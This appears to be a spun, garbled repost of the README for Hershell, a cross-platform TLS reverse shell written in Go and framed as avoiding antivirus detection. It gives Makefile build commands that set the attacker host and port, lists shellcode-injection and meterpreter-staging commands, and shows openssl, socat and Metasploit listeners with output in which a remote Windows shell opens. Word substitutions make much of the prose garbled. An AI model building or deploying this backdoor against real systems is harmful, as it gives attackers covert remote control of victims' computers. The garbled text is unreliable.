Hershell – Simple TCP reverse shell written in Go

Simple TCP reverse shell written in Go ^(https://golang.org/). It makes use of TLS to safe the communications, and supply a certificates public key fingerprint ^(http://www.kitploit.com/search/label/Fingerprint) pinning characteristic, combating from site visitors interception.
Supported OS are:
  • Windows
  • Linux
  • Mac OS
  • FreeBSD and derivatives

meterpreter ^(http://www.kitploit.com/search/label/Meterpreter) payloads are nice, they’re occasionally noticed through AV merchandise.
The purpose of this mission is to get a easy reverse shell, which will paintings on more than one techniques,

How ?
Since it is written in Go, you’ll be able to pass bring together the supply for the required structure.

Building the payload
To simplify issues, you’ll be able to use the equipped Makefile. You can set the next surroundings variables:

  • GOOS : the objective OS
  • GOARCH : the objective structure
  • LHOST : the attacker IP or area title
  • LPORT : the listener port

For the GOOS and GOARCH variables, you’ll be able to get the allowed values right here ^(https://golang.org/doc/install/source#environment).
However, some helper goals are to be had in the Makefile:

  • relies : generate the server certificates (required for the reverse shell)
  • home windows32 : builds a home windows 32 bits executable (PE 32 bits)
  • home windows64 : builds a home windows 64 bits executable (PE 64 bits)
  • linux32 : builds a linux 32 bits executable (ELF 32 bits)
  • linux64 : builds a linux 64 bits executable (ELF 64 bits)
  • macos : builds a mac os 64 bits executable (Mach-O)

For the ones goals, you simply want to set the LHOST and LPORT surroundings variables.

Using the shell
Once accomplished, you are going to be supplied with a far off shell. This customized interactive shell will will let you execute gadget instructions via cmd.exe on Windows, or /bin/sh on UNIX machines.
The following particular instructions are supported:

  • run_shell : drops you an gadget shell (permitting you, for instance, to modify directories)
  • inject : injects a shellcode (base64 encoded) in the similar procedure reminiscence, and executes it (Windows best in this day and age)
  • meterpreter IP:PORT : connects to a multi/handler to get a stage2 reverse tcp meterpreter ^(http://www.kitploit.com/search/label/Meterpreter) from metasploit, and execute the shellcode in reminiscence (Windows best in this day and age)
  • go out : go out gracefully

Examples
First of all, it is very important generate a sound certificates:

$ make relies
openssl req -subj '/CN=sysdream.com/O=Sysdream/C=FR' -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout server.key -out server.pem
Generating a 4096 bit RSA non-public key
....................................................................................++
.....++
writing new non-public key to 'server.key'
-----
cat server.key >> server.pem

For home windows:

# Custom goal
$ make GOOS=home windows GOARCH=amd64 LHOST=192.168.0.12 LPORT=1234
# Predifined goal
$ make home windows32 LHOST=192.168.0.12 LPORT=1234

For Linux:

# Custom goal
$ make GOOS=linux GOARCH=amd64 LHOST=192.168.0.12 LPORT=1234
# Predifined goal
$ make linux32 LHOST=192.168.0.12 LPORT=1234

For Mac OS X

$ make macos LHOST=192.168.0.12 LPORT=1234

Listeners
On the server aspect, you’ll be able to use the openssl ^(http://www.kitploit.com/search/label/OpenSSL) built-in TLS server:

$ openssl s_server -cert server.pem -key server.key -accept 1234
Using default temp DH parameters
ACCEPT
unhealthy gethostbyaddr
-----BEGIN SSL SESSION PARAMETERS-----
MHUCAQECAgMDBALALwQgsR3QwizJziqh4Ps3i+xHQKs9lvp5RfsYPWjEDB68Z4kE
MHnP0OD99CHv2u27THKvCHCggKEpgrPnKH+vNGJGPJZ42QylfkekhSwY5Mtr5qYI
5qEGAgRYgSfgogQCAgEspAYEBAEAAAA=
-----END SSL SESSION PARAMETERS-----
Shared ciphers:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA:AES256-SHA:ECDHE-RSA-DES-CBC3-SHA:DES-CBC3-SHA
Signature Algorithms: RSA+SHA256:ECDSA+SHA256:RSA+SHA384:ECDSA+SHA384:RSA+SHA1:ECDSA+SHA1
Shared Signature Algorithms: RSA+SHA256:ECDSA+SHA256:RSA+SHA384:ECDSA+SHA384:RSA+SHA1:ECDSA+SHA1
Supported Elliptic Curve Point Formats: uncompressed
Supported Elliptic Curves: P-256:P-384:P-521
Shared Elliptic curves: P-256:P-384:P-521
CIPHER is ECDHE-RSA-AES128-GCM-SHA256
Secure Renegotiation IS supported
Microsoft Windows [version 10.0.10586]
(c) 2018 Microsoft Corporation. Tous droits rservs.

C:UsersLAB2Downloads>

Or even higher, use socat with its readline module, which provides you with a to hand historical past characteristic:

$ socat readline openssl-concentrate:1234,fork,reuseaddr,test=0,cert=server.pem
Microsoft Windows [version 10.0.10586]
(c) 2018 Microsoft Corporation. Tous droits rservs.

C:UsersLAB2Downloads>

Or, and that is nice, use a metasploit ^(http://www.kitploit.com/search/label/Metasploit) handler:

[172.17.0.2][Sessions: 0][Jobs: 0]: > use exploit/multi/handler
[172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > set payload python/shell_reverse_tcp_ssl
payload => python/shell_reverse_tcp_ssl
[172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > set lhost 192.168.122.1
lhost => 192.168.122.1
[172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > set lport 4444
lport => 4444
[172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > set handlersslcert /tmp/knowledge/server.pem
handlersslcert => /tmp/knowledge/server.pem
[172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > set exitonsession false
exitonsession => false
[172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > exploit -j
[*] Exploit operating as background process.

[-] Handler didn't bind to 192.168.122.1:4444
[*] Started reverse SSL handler on 0.0.0.0:4444
[*] Starting the payload handler...
[172.17.0.2][Sessions: 0][Jobs: 1]: exploit(handler) >
[*] Command shell consultation 1 opened (172.17.0.2:4444 -> 172.17.0.1:51995) at 2018-02-09 12:07:51 +0000
[172.17.0.2][Sessions: 1][Jobs: 1]: exploit(handler) > periods -i 1
[*] Starting interplay with 1...

Microsoft Windows [version 10.0.10586]
(c) 2018 Microsoft Corporation. Tous droits rservs.

C:Userslab1Downloads>whoami
whoami
desktop-jcfs2oklab1

C:Userslab1Downloads>

Credits
Ronan Kervella

Download Hershell ^(https://github.com/sysdream/hershell)